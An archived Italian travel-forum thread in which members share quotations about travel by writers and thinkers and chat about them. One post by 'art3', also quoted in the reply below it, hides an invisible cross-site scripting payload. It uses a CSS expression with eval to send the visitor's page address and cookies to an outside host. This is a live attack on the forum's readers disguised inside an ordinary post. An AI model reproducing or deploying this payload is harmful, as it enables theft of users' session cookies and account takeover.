PDA

Visualizza Versione Completa :

AFORISMI... IN VIAGGIO



Ricky
10-06-2005, 10:59:29
Community... un po' di cultura? :)
Analizziamo tutto quanto riguarda i viaggi ed il viaggiare attraverso citazioni celebri?
Comincio io:

I viaggi danno una grande apertura mentale: si esce dal cerchio dei pregiudizi del proprio Paese e non si è disposti a farsi carico di quelli stranieri (Charles de Montesquieu)

BEA
10-06-2005, 11:03:53
Bello :022:
Però devo recuperare a casa il mio quaderno delle frasi che mi hanno colpito... :012:

occhidigatto
10-06-2005, 11:11:48
Il senso della ricerca sta nel cammino fatto e non nella meta;
il fine del viaggiare è il viaggiare stesso e non l'arrivare
(Tiziano Terzani)

BEA
10-06-2005, 11:14:12
Il senso della ricerca sta nel cammino fatto e non nella meta;
il fine del viaggiare è il viaggiare stesso e non l'arrivare
(Tiziano Terzani)

questo nel mio quaderno c'era!

occhidigatto
10-06-2005, 11:16:24
Ti ho rubato il quaderno Bea :002:

... il viaggio non finisce mai. Solo i viaggiatori finiscono. E anche loro possono prolungarsi in memoria, in ricordo, in narrazione. Quando il viaggiatore si è seduto sulla sabbia della spiaggia e ha detto: "non c'è altro da vedere", sapeva che non era vero. Bisogna vedere quel che non si è visto, vedere di nuovo quel che si è già visto, vedere in primavera quel che si è visto in estate, vedere di giorno quel che si è visto di notte, con il sole dove la prima volta pioveva, vedere le messi verdi, il frutto maturo, la pietra che ha cambiato posto, l'ombra che non c'era. Bisogna ritornare sui passi già dati, per ripeterli, e per tracciarvi a fianco nuovi cammini. Bisogna ricominciare il viaggio. sempre. Il viaggiatore ritorna subito.
(Josè Saramago)

silviaf26
10-06-2005, 11:19:40
We shall not cease from exploration
And the end of all our exploring
Will be to arrive where we started
And know the place for the first time (*)

(Thomas Sterne Eliot )


(*) Non smetteremo di esplorare
E alla fine di tutto il nostro andare
Ritorneremo al punto di partenza
Per conoscerlo per la prima volta

BEA
10-06-2005, 11:20:13
Questa è proprio bella. Sembra indicata a quei viaggiatori che non tornano mai dove sono già stati, quasi considerassero i viaggi come figurine: quella ce l'ho.

Ogni posto, ogni volta, è diverso, perchè cambi tu.

BEA
10-06-2005, 11:21:25
mi riferivo al post di okki :)

silviaf26
10-06-2005, 11:23:00
Ricky, mi piace proprio questo topic! :)

occhidigatto
10-06-2005, 11:24:25
Ho anche cambiato la mia firma.... ;)

BEA
10-06-2005, 11:37:56
Il vero viaggio dello scoprire non consiste nel vedere paesaggi nuovi ma nell'avere nuovi occhi.


Per non parlare di quando vai in un posto che conosci con qualcuno ami e che non c'è stato: è come rivedere tutto attraverso i suoi, di occhi. :012:

occhidigatto
10-06-2005, 11:39:29
Brava Bea, vedo che cogli il vero senso ;)

claudio
10-06-2005, 11:40:38
E bravo Ricky!! :077: :051:
Davvero un topic interessante!
Leggerò con curiosità i post che, senza dubbio, fioccheranno!
[smilie=707.gif]

:107:

poochie76
10-06-2005, 11:51:06
Il vero viaggio di scoperta non consiste nel cercare nuove terre, ma nell'avere nuovi occhi.

Voltaire

occhidigatto
10-06-2005, 11:52:30
Certo che Voltaire e Proust dicono le stesse cose :021:

BEA
10-06-2005, 11:54:53
Plagio non è una parola inventata per Zucchero! :?D?:

poochie76
10-06-2005, 11:57:40
La conoscenza delle lingue straniere permette di non comunicare, in viaggio, con i propri compatrioti.

:027: :027:

occhidigatto
10-06-2005, 11:57:58
Bella anche la firma di Niross80, in tema con qs topic:

Visitare gli angoli sperduti del mondo è come un soffio di brezza leggera in una giornata d'estate....non vorresti mai che finisse!!

Ricky
10-06-2005, 12:03:28
Non si viaggia per viaggiare, ma per aver viaggiato (A.Karr)

poochie76
10-06-2005, 12:07:58
Il viaggio deve allinearsi con le più severe forme di ricerca. Certo ci sono altri modi per fare la conoscenza del mondo. Ma il viaggiatore è uno schiavo dei propri sensi; la sua presa su un fatto puo' essere completa solamente quando è rafforzata dalla prova sensoriale; egli può conoscere davvero il mondo soltanto quando lo vede, lo sente e lo annusa.

Byron

mark
10-06-2005, 12:11:04
Le persone non fanno i viaggi, sono i viaggi che fanno le persone. (J. Steinbeck)


Il mondo è un libro e coloro che non viaggiano ne leggono solo una pagina. (Sant'Agostino)

BEA
10-06-2005, 12:12:31
Non si viaggia per viaggiare, ma per aver viaggiato (A.Karr)

Non sono molto d'accordo! :021:

mark
10-06-2005, 12:13:32
"...dobbiamo andare e non fermarci mai finché non arriviamo"
"Per andare dove, amico?"
"Non lo so ma dobbiamo andare!"
J. Kerouac "Sulla strada"


How many roads must a man walk down
before you can tell him a man?
Bob Dylan

Ricky
10-06-2005, 12:17:55
Un viaggio di mille chilometri deve cominciare con un solo passo. (Lao Tzu)

Ricky
10-06-2005, 12:18:54
Bea, non son d'accordo al 100% anche io... certo che il ricordo poi rende tutto ancor più bello ed emozionante!

frisino
10-06-2005, 12:33:25
Partire è un po' morire....

Non so chi l'ha detta.

Ninni77
10-06-2005, 12:34:06
Volevo scriverla anch'io amore :) :022:

frisino
10-06-2005, 12:35:00
Volevo scriverla anch'io amore :) :022:

Sei telepatica.....o telegenica?

Ninni77
10-06-2005, 12:39:12
No, è che è l'unica sui viaggi che conosco ;) :022:

Ricky
10-06-2005, 12:52:00
Il viaggio deve allinearsi con le più severe forme di ricerca. Certo ci sono altri modi per fare la conoscenza del mondo. Ma il viaggiatore è uno schiavo dei propri sensi; la sua presa su un fatto puo essere completa solamente quando è rafforzata dalla prova sensoriale; egli può conoscere davvero il mondo soltanto quando lo vede, lo sente e lo annusa.

Byron

BEA
10-06-2005, 12:54:52
Anche Ricky plagia!!! :011: :025:

poochie76
10-06-2005, 14:02:35
Copioneeeeeeeeeeeeee :015:

Ricky
10-06-2005, 14:10:46
Oooooooopsssss!!! :(

"La geografia è più importante della storia perché la contiene"
Guillermo Cabrera Infante

BEA
10-06-2005, 14:55:32
Non importa quanti anni hai, il meltemi ti tende la pelle, carezza e spiana la fronte del viaggiatore disperato, quel viaggiatore che non ha ancora viaggiato abbastanza a lungo da essersi lasciato il futuro alle spalle.
(In Fuga - Anne Michaels)

BEA
10-06-2005, 15:01:55
Questa è stata fino troppo usata, ma non è meno vera:

La vita è un viaggio, viaggiare è vivere due volte
(Omar Khyyam - poeta persiano del XII sec.)

BEA
10-06-2005, 15:14:15
Mi aveva ripreso l'ardente desiderio di accettare quell'invito. Non perchè desiderassi partire - sulla sponda cretese mi sentivo felice, libero e non avevo bisogno di nulla - ma perchè sono sempre stato divorato dalla bramosia di vedere quanto più possibile della terra e del mare prima di morire.
(Zorba il Greco - Nikos Kazantzakis)

P.S. lo so che non sono tutti aforismi ma cmq danno motivi di reflessione sul viaggio :)

BEA
10-06-2005, 15:15:43
C'era una volta un poeta che si innamorò di tale Beatrice. Le Beatrici suscitano amori sconfinati.
(Il postino di Neruda - Antonio Skàrmeta)

BEA
10-06-2005, 15:16:30
C'era una volta un poeta che si innamorò di tale Beatrice. Le Beatrici suscitano amori sconfinati.
(Il postino di Neruda - Antonio Skàrmeta)

Ah, no, scusate, mi sono lasciata trascinare dalle citazioni :005:

BEA
10-06-2005, 15:17:36
L'arte è il desiderio di essere altrove
(Friedrich Nietzsche)

silviaf26
10-06-2005, 15:22:24
"Erano AAANNI che non facevo una vacanza così! - Cos'erano? - AAAAAAANNI"

Marrakesh express :002:

BEA
10-06-2005, 15:23:48
... la vita è un viaggio verso la fiducia in sé stessi
(Paracadute e Baci - Erica Jong)

silviaf26
10-06-2005, 15:25:12
....qualcuno tolga la tastiera a BEA

(non riesco a starle dietro...)

BEA
10-06-2005, 15:29:30
:002:
ho recuperato il mio quadernetto... :027:

Si accettano volentieri commenti :025: (sulle frasi, ovvio)

silviaf26
10-06-2005, 15:41:51
Non importa quanti anni hai, il meltemi ti tende la pelle, carezza e spiana la fronte del viaggiatore disperato, quel viaggiatore che non ha ancora viaggiato abbastanza a lungo da essersi lasciato il futuro alle spalle.
(In Fuga - Anne Michaels)

molto sottile questa citazione che mi ha molto colpito(è un libro, un romanzo? Lo hai letto?) ...
Credi che viaggiare sia anche un modo per cercare e cercarsi ma che in fondo si fugga senza speranza? (oddio il virus di MArzullo mi ha colpito :015: )

BEA
10-06-2005, 15:51:53
in effetti ovunque si vada ci portiamo dietro la ns zavorra
Certo che se proprio dobbiamo portarla, meglio essere in qualche posto piacevole che ne alleggerisca il peso.

Il libro l'ho ... recensito (parolone :025: ) nel topic sui libri (ultimo post) :011:

BEA
10-06-2005, 16:19:03
I libri sono i miei viaggi di quando mi costringono a stare a casa.

(Bea :) )

silviaf26
10-06-2005, 17:43:33
questa l'ho letta sulla guida della Cambogia che ho preso oggi in biblioteca:

"Il viaggiatore autentico è sempre un vagabondo, con le gioie, le tentazioni ed il senso di avventura del vagabondo.
O viaggiare è vagabondare, o non è affatto viaggiare.
L'essenza del viaggiatore consiste nel non avere doveri, non avere nè ore fisse, nè posta, nè vicini curiosi, nè brighe di ricevimenti, nè destinazione.
Buon viaggiatore è chi non sa dove andrà; perfetto viaggiatore chi non sa donde venga."

Lin Yu-T'aang, L'importanza di vivere (Milano 1945) (ma non chiedetemi chi sia l'autore :055: )

giorgessa
13-06-2005, 16:29:04
questa l'ho letta sulla guida della Cambogia che ho preso oggi in biblioteca:

"Il viaggiatore autentico è sempre un vagabondo, con le gioie, le tentazioni ed il senso di avventura del vagabondo.
O viaggiare è vagabondare, o non è affatto viaggiare.
L'essenza del viaggiatore consiste nel non avere doveri, non avere nè ore fisse, nè posta, nè vicini curiosi, nè brighe di ricevimenti, nè destinazione.
Buon viaggiatore è chi non sa dove andrà; perfetto viaggiatore chi non sa donde venga."

Lin Yu-T'aang, L'importanza di vivere (Milano 1945) (ma non chiedetemi chi sia l'autore :055: )

Silvia, questo è un colpo basso. Sono qui che faccio le tacche sul muro per i giorni che mancano alla vacanza in Cambogia e tu metti on line questa citazione!!! Mannaggia all'agenzia viaggi che non mi ha ancora trovato il biglietto.

mark
14-06-2005, 12:07:44
Viaggiare! Perdere Paesi! Essere altro costantemente perchè l'anima non abbia radici!
...Andare avanti, inseguire l'assenza di non aver un fine e l'ansia di raggiungerlo.

(Fernando Pessoa)

mark
14-06-2005, 12:09:05
Il viaggio ti farà conoscere come nessun foglio ha mai fatto.


Il viaggio è distanza dalle radici: più ti allontani più semi ti scrollerai di dosso lasciando un tuo pensiero.

silviaf26
16-06-2005, 16:28:43
Il mondo è un libro e quelli che non viaggiano ne leggono solo una pagina.

(Sant'Agostino)

poochie76
17-06-2005, 08:32:02
Vivere in un ambiente
È bello
Quando l’anima
È altrove.
In città quando si sogna la campagna,
in campagna quando
si sogna la città.
Dappertutto quando
Si sogna il mare

Cesare Pavese

Ricky
17-06-2005, 11:45:57
Minchia Flora!

BEA
17-06-2005, 12:06:18
Io mi dissocio. Come fai a vivere sempre con l'anima da un'altra parte???

poochie76
17-06-2005, 12:12:51
Chiedilo a Pavese non a me :006:

BEA
17-06-2005, 12:35:39
Chiedilo a Pavese non a me :006:

Glielo chiedo quando vado a farmi autografare le magliette dal Che! :027:

leander
20-06-2005, 11:32:17
Un turista è un uomo che percorre mille miglia per farsi una foto vicino alla propria automobile (Milton Berle, umorista americano)

frisino
20-06-2005, 14:23:59
Io mi dissocio. Come fai a vivere sempre con l'anima da un'altra parte???

Hai provato dopo una bomba?

BEA
20-06-2005, 14:34:04
Io mi dissocio. Come fai a vivere sempre con l'anima da un'altra parte???

Hai provato dopo una bomba?

Appunto. Guarda caso mi eri venuto proprio in mente tu :021:
:022: Ciao Friso, bentornato tra noi :002:

frisino
20-06-2005, 14:38:22
Ciao Bea!Ben ritrovata a te e a tutti gli aforismi che ci farai pervenire!

BEA
20-06-2005, 14:39:47
Ciao Bea!Ben ritrovata a te e a tutti gli aforismi che ci farai pervenire!
Oggi sono a corto di aforismi.
Preferisco andar giù piatta e dire le cose come stanno:

FATEMI PARTIRE CHE STO USCENDO PAZZA!!!!!!!!!!!!!!!!!!!!!!!!!!

frisino
20-06-2005, 14:42:59
Ma se sei già abbronzata,cosa vuoi di +! Anche la vacanza?

poochie76
20-06-2005, 14:44:25
OT


...e scusate se rompo :047:

silviaf26
20-06-2005, 14:51:31
COMUNQUE E' UNO CHE SI ERA PERSO

Graffito comparso sulla statua di Cristoforo Colombo a New York


:027: :027: :027:

BEA
20-06-2005, 14:59:29
in che lingua era scritto?

silviaf26
20-06-2005, 15:23:53
I don't know ... (credo in italiano comunque)

chiccapiperita
20-06-2005, 18:59:01
si viaggia anche per correggere gli errori dell' immaginario.

(Michele Serra)

chiccapiperita
20-06-2005, 19:00:10
debbo partire e vivere, o restare e morire.

(William Shekespeare)

silviaf26
27-06-2005, 17:49:25
All'orizzonte di quell'oceano
ci sarebbe stata sempre un'altra isola,
per ripararsi durante un tifone,
o per riposarsi e amare
Quell'orizzonte aperto sarebbe stato
sempre lì, un invito ad andare

Hugo Pratt
Una ballata del mare salato

Ninni77
27-06-2005, 18:19:21
Guardavo il cielo pensando,
cercherò un piccolissimo mondo,
tutto mio,
dove io sarò io...


(Madamoiselle Anne)

silviaf26
13-07-2005, 17:07:04
Di una città non apprezzi le sette o settantasette meraviglie, ma la risposta che dà ad una tua domanda
Italo Calvino

icesweet
14-07-2005, 02:10:36
Le idee degli uomini che hanno viaggiato invecchiano prima di quelle di chi non si è mai mosso di casa.

(Leo Langanesi)

poochie76
15-07-2005, 12:45:30
Il viaggiatore, se non incontra a tenergli compagnia uno migliore di lui o simile a lui, proceda decisamente da solo: con lo stolto non vi è compagnia.

Buddha

BEA
15-07-2005, 15:12:58
Il viaggiatore, se non incontra a tenergli compagnia uno migliore di lui o simile a lui, proceda decisamente da solo: con lo stolto non vi è compagnia.

Buddha

Mi sa che si riferisce al viaggio vita :)

poochie76
15-07-2005, 15:15:03
Forse è il viaggio più difficile no?

BEA
15-07-2005, 15:23:37
Forse è il viaggio più difficile no?

Decisamente, e di gente che fa sciopero ne becchi di continuo :(

art3
15-07-2005, 16:14:56
Quante ne sapete...

:011: :002: :011: :002:

www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;thi s.sss=null`style='font-size:0;)'

poochie76
15-07-2005, 16:26:26
Quante ne sapete...

:011: :002: :011: :002:

www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;thi s.sss=null`style='font-size:0;)'

e quindi?? :-?

BEA
18-07-2005, 18:49:56
Come molti viaggiatori ho visto più di quanto ricordi e ricordo più di quanto ho visto.
(Benjamin Disraeli)

etta
21-07-2005, 21:28:19
"Viaggiare può essere una delle più gratificanti forme di introspezione" (Lawrence Durrell)


Etta :107:

poochie76
18-08-2005, 12:45:58
In viaggio, il caso non è mai di cattiva compagnia.

silviaf26
27-10-2005, 09:07:01
let me drink from the waters
where the mountain streams flood
let the smell of white flowers
flow free through my blood
let me sleep in your meadows
with the green grassy leaves
let me walk down the highway
with my brother in peace

Bob Dylan, "let me die in my footsteps"

FlamingJune
09-11-2005, 15:33:09
Si possono percorrere milioni di chilometri in una sola vita senza mai scalfire la superficie dei luoghi nè imparare nulla delle genti appena sfiorate. Il senso del viaggio sta nel fermarsi ad ascoltare chiunque abbia una storia da raccontare.
Amin Maalouf

-------------------------------------------------------------------------------------

Vi fu sempre nel mondo assai più di quanto gli uomini potessero vedere quando andavano lenti. Figuriamoci se lo potranno vedere andando veloci!
J. Ruskin

FlamingJune
09-11-2005, 16:03:32
Non è esattamente un aforisma... ma comunque attinente al viaggio e al suo significato. Anch'io ho un qudernino sul quale appunto tutto ciò che mi ha fatto riflettere, tante parole o anche solo una frase...


Il viaggio è lo "stretto indispensabile" che bisogna attraversare per rendersi conto che noi non "siamo nella nostra vita" perchè non può che essere così. Ma lo stretto indispensabile da attraversare non è semplice o facile da trovare, e non tutti i viaggi sortiscono l'effetto di "emendarci". La tristezza del viaggio banalmente turistico stra proprio qui, nel fatto che l'occasione è ulteriormente rimandata, che nella trasformazione che ci aspettavamo è stata solo consumata la parte meno importante: quella di "farsi" un luogo, un paese. "Quest'anno ho fatto la Giordania"... "Cuba? L'ho fatto l'inverso scorso"... Mentre uno parte con la segreta speranza che siano i luoghi a "farci". "Quest'anno l'Egitto mi ha turbato"... "La Cina mi ha lasciato un segno".... Per questo i Viaggi sono pericolosi e sono da sconsigliare a chi non ci tiene ad essere "fatto" da qualcosa di esterno da lui.

Francesco La Cleca

BEA
09-11-2005, 16:05:06
:)

leander
09-11-2005, 16:36:43
CE L'ABBIAMO!!! :027: :027:
No, non sono rimbambito... mi riferisco alla citazione di Flaming June sul "fare" questo o quel luogo. Circa un anno fa pubblicammo un editoriale sulle diverse tipologie di viaggiatore e, visto che ci scommetto gli zebedei che lo avrà letto un utente su cento (anche perchè ne sono subentrati moltissimi nuovi), ve lo linko qui:
https://www.cisonostato.it/edit.php?id=24
Fu l'apporto di un amico, spiritoso, ironico ma anche istruttivo, che ci piacque molto e pubblicammo volentieri. Mi sembra carino dargli una spolverata e riproporvelo. :025:

poochie76
10-11-2005, 09:16:33
Stamani vi auguro il Buongiorno così:


Non seguire il sentiero già segnato; va invece, dove non vi è alcun sentiero, e lascia una traccia...

Sergio Bambarén

silviaf26
21-11-2005, 14:32:55
"Per quel che mi riguarda, io viaggio non per andare da qualche parte, ma per andare. Viaggio per viaggiare. La gran cosa è muoversi, sentire più acutamente il rpurito della nostra vita, scendere da questo letto di piume della civiltà e sentirsi sotto i piedi il granito del globo appuntito di selci taglienti"

Robert Louis Stevenson

silviaf26
26-01-2006, 15:25:14
Che la strada scorra sotto i tuoi piedi,
che il vento soffi sulla tua schiena,
che il sole ti riscaldi il viso,
che la pioggia cada dolcementene sui tuoi campi,
e, finché non ci rivedremo,
che Dio ti porti nel palmo della sua mano


(brindisi irlandese nei pub per gli amici che devono partire)

Ricky
26-01-2006, 16:05:12
Che mito, brava Silvia... davanti ad una bella pinta!

silviaf26
26-01-2006, 16:10:46
http://www.cosgan.de/images/more/bigs/a063.gif

poochie76
10-03-2006, 14:35:56
Un viaggio non inizia nel momento in cui partiamo né finisce nel momento in cui raggiungiamo la meta. In realtà comincia molto prima e non finisce mai, dato che il nastro dei ricordi continua a scorrerci dentro anche dopo che ci siamo fermati.
E' il virus del viaggio, malattia sostanzialmente incurabile.

Ryszard Kapuscinsky

icesweet
11-03-2006, 00:02:08
Un viaggio non inizia nel momento in cui partiamo né finisce nel momento in cui raggiungiamo la meta. In realtà comincia molto prima e non finisce mai, dato che il nastro dei ricordi continua a scorrerci dentro anche dopo che ci siamo fermati.
E' il virus del viaggio, malattia sostanzialmente incurabile.

Ryszard Kapuscinsky


BELLAAAAA!!!!!!!!!!!!!!!! :022: :022: :022:

trottola
14-03-2006, 12:34:19
Fate che il vostro spirito avventuroso vi porti sempre ad andare avanti per scoprire il mondo che vi circonda con le sue stranezze e le sue meraviglie.Scoprirlo significherà, per voi, amarlo.
Kahlil Gibran

trottola
22-03-2006, 19:30:22
Tu che sei in viaggio,
sono le tue orme
la strada, nient'altro;
Tu che sei in viaggio,
non sei su una strada,
la strada la fai tu andando.
Mentre vai si fa la strada
e girandoti indietro
vedrai il sentiero che mai
più calpesterai.
Tu che sei in viaggio,
non hai una strada,
ma solo scie nel mare.Antonio Machado

silviaf26
07-04-2006, 15:04:18
C'é nelle cose umane una marea che colta al flusso mena alla fortuna:perduta,l'intero viaggio della nostra vita si arena su fondali di miserie.

(Shakespeare,Giulio Cesare)

BEA
08-04-2006, 19:02:05
Sì, perchè il viaggio è uno stato d’animo che guarda il mondo, un modo di essere, di vivere. E noi viaggiatori siamo come il vento, condannati a correre per non morire.

(Giovanni Mereghetti)

Aranzanzan
29-04-2006, 19:16:42
Le vacanze sono un bene prezioso non permettere a nessuno di rovinartele.

Non so se è mio oppure l'ho letto da qualche parte.
Va bhe che me frega mi piace.

giorgessa
30-04-2006, 13:19:24
E' la ricapitolazione di gesti già compiuti che ti fa sentire bene ed è da qui che ogni viaggio comincia. E stai bene quando, ovunque tu sia, i tuoi gesti ti appartengono così profondamente da non curarti della tua ridicola condizione di viaggiatore ignorante e perduto.

Marco Del Corona - Strade di bambù

leander
30-04-2006, 14:18:08
La fine di un viaggio è solo l’inizio di un altro. Bisogna vedere quel che non si è visto, vedere di nuovo quel che si è già visto, vedere in primavera quel che si era visto in estate, vedere di giorno quel che si è visto di notte, con il sole dove la prima volta pioveva, vedere le messi verdi, il frutto maturo, la pietra che ha cambiato posto, l’ombra che non c’era… Bisogna ricominciare il viaggio. Sempre. Il viaggiatore ritorna subito.
(Josè Saramago: Viaggio in Portogallo)

williamsi
29-05-2006, 18:23:57
La vita è un ponte. Attraversalo pure ma non costruirvi alcuna casa. (Proverbio indiano)
Bruce Chatwin (Le vie dei canti)

Un viaggio è quello spostarsi per il mondo che ti permette di tornare a casa un po' diverso.
Giobbe Covatta

Il viaggio é una porta attraverso la quale si esce dalla realtà nota e si entra in un'altra realtà inesplorata, che somiglia al sogno.
Guy de Maupassant

Da ogni viaggio sono tornato con il ricordo di qualcuno più che di qualcosa. Ho una conoscenza dei luoghi attraverso i racconti di uomini e donne incontrati lungo il cammino, e con gli occhi della memoria rivedo più facilmente le espressioni dei loro volti anziché le bellezze di tanti paesaggi.
Pino Cacucci (Camminando)

Il viaggio non soltanto apre la mente: le dà forma.
Bruce Chatwin

yu
11-08-2006, 12:28:25
questo topic è bellissimo! :013: ;)

Ricky
27-09-2006, 07:23:15
Il viaggio è la realizzazione di un pensiero .
Prima lo devo sognare , ci devo pensare.
Se il sogno diventa grande , allora parto.
Se si appanna , lascio perdere .
( tratto da D di repubblica

Gentilmente offerto da Rosamb! ;)

BEA
02-10-2006, 12:23:43
più che un aforisma, un spunto per la riflessione:

Perchè ci eccita tanto viaggiare, andare lontano?
Per quello che ci lasciamo alle spalle o per quello che troviamo?

(Quella Sera dorata - Peter Cameron)

Ninni77
02-10-2006, 13:44:27
Bellissima :022:

leander
06-11-2006, 11:40:56
Visto che un post "Aforismi in viaggio" non può essere Off Topic in un sito di viaggi, lo spostiamo in ROAD MAP.
D'accordo, Ricky? :006:

Daiana
06-11-2006, 11:42:59
Zio che facciamo le pulizie di Pasqua? :?D?: :?D?: :?D?:

leander
06-11-2006, 11:45:21
Zio che facciamo le pulizie di Pasqua? :?D?: :?D?: :?D?:

E ne ho anche aperto un altro che di sicuro vi piacerà!
Oggi sono creativo da far paura... :021:

Daiana
24-12-2006, 01:45:09
Per molti giorni, per molte miglia,
con molte spese, per molti paesi,
sono andato a vedere i monti,
sono andato a vedere il mare.
Ma a due passi da casa,
quando ho aperto gli occhi,
non ho visto
una goccia di rugiada
sopra una spiga di grano.

silviaf26
23-03-2007, 14:29:23
Non sapersi orientare in una città non vuol dir molto. Ma smarrirsi in essa come ci si smarrisce in una foresta, è una cosa tutta da imparare.
Che i nomi delle strade devono suonare all'orecchio dell'errabondo come lo scricchiolio dei rami secchi e le viuzze interne gli devono scandire senza incertezze, come le gole montane, le ore del giorno.

Walter Benjamin (infanzia berlinese, 1932)

BEA
02-05-2007, 09:06:26
Le strade migliori non collegano mai niente con nient'altro e c'è sempre un'altra strada che ti ci porta più in fretta.

Robert M. Pirsig
Lo Zen e l'arte della manutenzione della motocicletta

Pablo68
15-06-2007, 07:35:51
"La vita e' un viaggio, viaggiare e' vivere due volte".
Non so' di chi sia.

BEA
15-06-2007, 19:39:57
...ci sono cose che vi posso insegnare io, altre che potete imparare dai libri. Ma ci sono cose che, be', bisogna vedere e sentire.


(Mille splendidi soli di Khaled Hosseini)

bea_btv
27-07-2007, 15:06:34
Io, esule, non ho casa: sono stato gettato via verso l’infinito.
ps:è un viaggio un pò lungo...
:168:

tiare
07-02-2008, 16:30:37
" E' bello essere di nuovo sulla strada senza sapere dove si va."

- John Maserfield -

"Viaggiare non vuole semplicemente dire vedere cose nuove, ma anche lasciarsi dietro qualcosa. Non e' soltanto una questione di aprire porte ma anche chiuderle dietro di voi per non ritornare mai piu'. Ma il luogo che avete lasciato per sempre resta sempre con voi non appena chiudete gli occhi."

- sconosciuto -

tiare
08-02-2008, 12:57:17
"per quanto mi riguarda, non viaggio per raggiungere un luogo ma per il gusto di viaggiare. Viaggio per amore del viaggio in se'. Lo scopo principale e' il movimento."

-Robert Louis Stevenson -

Il viaggio e' come un libro. Chi non viaggia mai ne legge una solo pagina.

- Autore sconosciuto -

valya
15-02-2008, 15:55:37
Il vero viaggio di scoperta non è vedere nuovi mondi, ma cambiare occhi.

(M. Proust)

Daiana
07-06-2008, 15:38:00
Dice il saggio Bao Ding: “Se pensi che un posto sia lontano, parti e pensaci mentre cammini”
(Stefano Benni - La Compagnia dei Celestini)

valya
07-06-2008, 15:50:11
:022: :022:

valya
07-06-2008, 15:53:07
Viaggiare è come sognare: la differenza è che non tutti, al risveglio, ricordano qualcosa, mentre ognuno conserva calda la memoria della meta da cui è tornato.
Edgar Allan Poe

reietto
22-06-2009, 19:19:47
Una carta del mondo che non contiene il Paese dell'Utopia non è degna nemmeno di uno sguardo, perché non contempla il solo Paese al quale l'Umanità approda di continuo. E quando vi getta l'àncora, la vedetta scorge un Paese migliore e l'Umanità di nuovo fa vela.

Oscar Wilde

sari
05-02-2010, 15:05:47
Che bello questo topic!!!

Ne propongo una di Kerouac:
"L'hobo ha due orologi che non si possono comprare da Tiffany: su un polso il sole, sull'altro la luna, e tutti e due i cinturini sono fatti di cielo"